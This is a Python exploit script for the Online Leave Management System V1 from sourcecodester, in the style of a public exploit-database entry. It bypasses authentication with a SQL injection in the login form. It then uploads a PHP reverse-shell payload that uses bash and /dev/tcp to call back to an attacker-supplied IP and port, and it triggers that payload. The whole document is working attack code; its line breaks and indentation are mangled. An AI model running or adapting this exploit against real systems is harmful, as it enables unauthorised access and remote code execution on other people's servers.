# Date: 24-08-2021
# Exploit Author: Justin White
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html
# Version: V1
# Category: Webapps
# Tested on: Linux
#!/bin/env python3
import requests
import time
import sys
from colorama import Fore, Style
if len(sys.argv) != 4:
print('python3 script.py <target url> <attacker ip>
<attacker port>')
print('Example: python3 script.py http://127.0.0.1/ 10.0.0.1
4444')
exit()
else:
try:
url = sys.argv[1]
attacker_ip = sys.argv[2]
attacker_port = sys.argv[3]
print()
print('[*] Trying to login...')
time.sleep(1)
login = url + '/classes/Login.php?f=login'
payload_name = "reverse_shell.php"
payload_file = r"""<?php exec("/bin/bash -c 'bash -i >&
/dev/tcp/\"{}\"/{} 0>&1'");?>""".format(attacker_ip,
attacker_port)
session = requests.session()
post_data = {"username": "'' OR 1=1-- -'", "password": "'' OR 1=1--
-'"}
user_login = session.post(login, data=post_data)
cookie = session.cookies.get_dict()
if user_login.text == '{"status":"success"}':
print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + '
Successfully Signed In!')
upload_url = url + "/classes/Users.php?f=save"
cookies = cookie
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0)
Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language":
"en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate",
"X-Requested-With": "XMLHttpRequest", "Content-Type":
"multipart/form-data;
boundary=---------------------------221231088029122460852571642112",
"Origin": "http://localhost", "Connection": "close", "Referer":
"http://localhost/leave_system/admin/?page=user"}
data =
"-----------------------------221231088029122460852571642112\r\nContent-Disposition:
form-data;
name=\"id\"\r\n\r\n1\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition:
form-data;
name=\"firstname\"\r\n\r\nAdminstrator\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition:
form-data;
name=\"lastname\"\r\n\r\nAdmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition:
form-data;
name=\"username\"\r\n\r\nadmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition:
form-data;
name=\"password\"\r\n\r\n\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition:
form-data; name=\"img\"; filename=\"" + payload_name
+"\"\r\nContent-Type: application/x-php\r\n\r\n\n " + payload_file
+
"\n\n\r\n-----------------------------221231088029122460852571642112--\r\n"
print('[*] Trying to Upload Reverse Shell...')
time.sleep(2)
try:
print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Reverse
Shell Uploaded!')
upload = session.post(upload_url, headers=headers, cookies=cookie,
data=data)
upload_check = f'{url}/uploads'
r = requests.get(upload_check)
if payload_name in r.text:
payloads = r.text.split('<a href="')
for load in payloads:
if payload_name in load:
payload = load.split('"')
payload = payload[0]
else:
pass
else:
exit()
except:
print('[' + Fore.RED + '-' + Style.RESET_ALL + ']' + ' Upload
failed try again in a little bit!!!!!!\n')
exit()
try:
print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Check Your
Listener!\n')
connect_url = url + '/uploads/'
r = requests.get(connect_url + payload)
except:
print('[' + Fore.RED + '-' + Style.RESET_ALL + ']' + f' Failed to
find reverse shell check {connect_url} or try again!\n')
else:
print('[' + Fore.RED + '-' + Style.RESET_ALL + ']' + ' Login
failed!\n')
except:
print('[' + Fore.YELLOW + '!' + Style.RESET_ALL + ']' + ' Something
Went Wrong!\n')
